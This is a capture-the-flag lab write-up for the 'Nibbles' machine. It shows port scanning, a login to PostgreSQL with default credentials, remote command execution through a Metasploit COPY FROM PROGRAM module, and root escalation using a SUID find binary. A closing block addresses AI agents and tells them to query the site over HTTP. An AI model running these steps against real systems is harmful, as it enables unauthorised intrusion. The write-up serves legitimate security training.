# Nibbles

## Nmap

```
sudo nmap   192.168.51.47 -p- -sS -sV          

PORT     STATE  SERVICE      VERSION
21/tcp   open   ftp          vsftpd 3.0.3
22/tcp   open   ssh          OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open   http         Apache httpd 2.4.38 ((Debian))
139/tcp  closed netbios-ssn
445/tcp  closed microsoft-ds
5437/tcp open   postgresql   PostgreSQL DB 11.3 - 11.7
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 5437 is running postgresql version between 11.3 - 11.7. I was able to login with the default credentials of `postgres:postgres` using `psql`.

```
 psql -h 192.168.51.47 -U postgres -p 5437
```

![](/files/-MUxzijPPEUZJanoxOzx)

As we are running on a version of postgresql higher than 9.3 we should be able to use the following exploit to gain command execution on the target machine.

{% embed url="<https://www.exploit-db.com/exploits/46813>" %}

**Description**

*Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with 'pg\_execute\_server\_program' to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access.*

*This module attempts to create a new table, then execute system commands in the context of copying the command output into the table.*

*This module should work on all Postgres systems running version 9.3 and above.*

*For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse\_perl*

*For Windows Systems, target 2 is used with Powershell payloads such as: cmd/windows/powershell\_reverse\_tcp Alternativly target 3 can be used to execute generic commands, such as a web\_delivery meterpreter powershell payload or other customized command.*

First ensure we are a superuser on postgresql:

```
SELECT current_setting('is_superuser');
```

![](/files/-MUy0LmyaYeoBrS2pAHc)

As we are confirmed a superuser we can use the following `Metasploit` module to gain a shell.

```
use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
```

![](/files/-MUy0tcjMP2sV2kcz3bF)

Execution:

![](/files/-MUy19SyCwuT7aPONqQ-)

Checking for SUID and PATH we have a '.' at the end of path and SUID bit set for the find `binary`.

![](/files/-MUy23kgyWT-3jYa7heH)

Knowing this we can attempt to gain privileges by exploiting the find binary. Checking [GTFOBins](https://gtfobins.github.io/gtfobins/find/#suid) shows we can escalate privileges:

![https://gtfobins.github.io/gtfobins/find/](/files/-MUy2Hd35ZHoWqU8TIJ9)

Running the following will escalate privileges:

```
find . -exec /bin/sh -p \; -quit
```

![](/files/-MUy2kogrjtptRX5OHM7)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/nibbles.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.